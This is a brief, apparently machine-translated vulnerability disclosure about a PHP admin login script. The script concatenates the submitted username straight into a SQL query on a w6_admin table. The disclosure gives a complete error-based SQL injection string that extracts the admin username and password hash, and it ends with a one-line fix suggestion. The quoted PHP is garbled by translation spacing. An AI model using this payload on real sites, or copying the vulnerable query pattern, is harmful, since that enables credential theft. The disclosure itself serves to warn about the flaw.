Check the code ..
01 ...... Several ......
02 if (! $ Postdb ["userid"] |! $ Postdb ["pwd"])
03 {
04 echo "<div align = \" center \ "class = \" style1 \ "> ";
05 echo "the user name or password you entered is incorrect !!! ";
06 echo "</div> ";
07 exit;
08}
09 www.2cto.com
10 $ postdb ["pwd"] = md5 ($ postdb ["pwd"]);
11
12
13 $ query = "SELECT * FROM 'w6 _ admin' WHERE 'userid' = '". $ postdb ["userid"]. "'"; // you know
14
15 $ result = mysql_query ($ query) or die ("cocould not connect:". mysql_error ());
16
17 $ num = mysql_num_rows ($ result );
18
19 if ($ num = 0)
20 {
21 echo "<div align = \" center \ "class = \" style1 \ "> ";
22 echo "the user name or password you entered is incorrect !!! ";
23 echo "</div> ";
24 exit;
25}
26
27 $ _ pwd = stripslashes (mysql_result ($ result, "0", "pwd "));
28 $ gptype = stripslashes (mysql_result ($ result, "0", "gptype "));
29 $ adminid = stripslashes (mysql_result ($ result, "0", "id "));
30 ...... Several ......
Test Method p:
Enter the username for background Login
'And (select 1 from (select count (*), concat (select concat (0x7e, 0x27, w6_admin.userid, 0x27, 0x7e, w6_admin.pwd) from w6_admin limit 0, 1) from information_schema.tables limit 0, 1), floor (rand (0) * 2) x from information_schema.tables group by x)) and '1' = '1 '/*
From: Toast author Cond0r
Fix and filter input